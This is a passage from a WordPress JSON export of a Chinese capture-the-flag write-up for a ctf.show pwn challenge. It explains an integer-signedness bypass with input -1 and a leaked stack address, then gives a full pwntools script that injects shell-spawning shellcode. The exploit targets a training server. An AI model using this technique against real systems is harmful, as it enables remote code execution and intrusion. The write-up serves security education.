unsigned __int16 *input()\n{\n  __int16 p_n1024; \/\/ [esp+Ah] [ebp-41Eh] BYREF\n  _BYTE buf[1025]; \/\/ [esp+Dh] [ebp-41Bh] BYREF\n  unsigned __int16 p_n1024_1; \/\/ [esp+40Eh] [ebp-1Ah] BYREF\n\n  strcpy(buf, \"???\");\n  memset(&buf[4], 0, 1021);\n  __isoc99_scanf(\"%hd\", &p_n1024);\n  if ( p_n1024 > 1024 )\n  {\n    puts(\"You are soooooooooo ******\");\n    exit(0);\n  }\n  p_n1024_1 = p_n1024;\n  printf(\"%x %u\\n\", buf, (unsigned __int16)p_n1024);\n  read(0, buf, p_n1024_1);\n  qmemcpy(\n    str,                                        \/\/ \"WTF?\"\n    buf,\n    0x400u);\n  unk_804B460 = buf[1024];\n  return &p_n1024_1;\n}<\/code><\/pre>\n\n\n\n
p_n1024\u662fint16\uff0c\u4f46\u662fp_n1024_1\u662funsigned __int16,\u4f1a\u53d1\u751f\u6574\u6570\u6ea2\u51fa<\/p>\n\n\n\n
\u8f93\u5165\u7684p_n1024\u8981\u5c0f\u4e8e1024\uff0c\u6211\u4eec\u53ef\u4ee5\u8f93\u5165-1\u7ed5\u8fc7\u5224\u65ad\uff0cbuf\u5e94\u8be5\u4f1a\u6ea2\u51fa\u5e76\u4e14\u6253\u5370\u6808\u5730\u5740\uff0c\u4e8e\u662f\u6211\u4eec\u53ef\u4ee5\u628ashellcode\u5199\u5728\u6808\u4e0a\uff0c\u6ea2\u51fa\u540e\u8df3\u8f6c\u5230\u6808\u6267\u884c<\/p>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n

\u6ea2\u51fa\u5927\u5c0f\u662f0x41b+4<\/p>\n\n\n\n
from pwn import *\ncontext(arch='i386',os='linux',log_level='debug')\n#p = process('.\/pwn109')\np = remote('pwn.challenge.ctf.show',28280)\nelf = ELF('.\/pwn110')\nshellcode=asm(shellcraft.sh())\noffset=0x41b+4\np.recvuntil('\\n')\np.sendlineafter(\"1+1= ?\",str(-1))\nleak=int(p.recvuntil(b' '),16)\n#print(hex(leak))\n\npayload=shellcode.ljust(offset,b'a')+p32(leak)\np.sendline(payload)\np.interactive()\n<\/code><\/pre>\n","protected":false},"excerpt":{"rendered":"
pwn101(\u5148\u5b66\u70b9\u4e1c\u897f\u5427) 64\u4f4d\u4fdd\u62a4\u5168\u5f00 v4\u548cn0x7FFFFFFF\u90fd\u6709\u521d\u59cb\u503c\uff0c\u4ed6\u8bf4\u8f93\u51652\u4e2a\u6574\u6570\uff0c\u82f1\u6587\u771f […]<\/p>\n","protected":false},"author":1,"featured_media":969,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[1],"tags":[4,8],"class_list":["post-941","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-learn","tag-pwn","tag-8"],"_links":{"self":[{"href":"http:\/\/lycoreco.cn\/index.php\/wp-json\/wp\/v2\/posts\/941","targetHints":{"allow":["GET"]}}],"collection":[{"href":"http:\/\/lycoreco.cn\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/lycoreco.cn\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/lycoreco.cn\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"http:\/\/lycoreco.cn\/index.php\/wp-json\/wp\/v2\/comments?post=941"}],"version-history":[{"count":4,"href":"http:\/\/lycoreco.cn\/index.php\/wp-json\/wp\/v2\/posts\/941\/revisions"}],"predecessor-version":[{"id":995,"href":"http:\/\/lycoreco.cn\/index.php\/wp-json\/wp\/v2\/posts\/941\/revisions\/995"}],"wp:featuredmedia":[{"embeddable":true,"href":"http:\/\/lycoreco.cn\/index.php\/wp-json\/wp\/v2\/media\/969"}],"wp:attachment":[{"href":"http:\/\/lycoreco.cn\/index.php\/wp-json\/wp\/v2\/media?parent=941"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/lycoreco.cn\/index.php\/wp-json\/wp\/v2\/categories?post=941"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/lycoreco.cn\/index.php\/wp-json\/wp\/v2\/tags?post=941"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}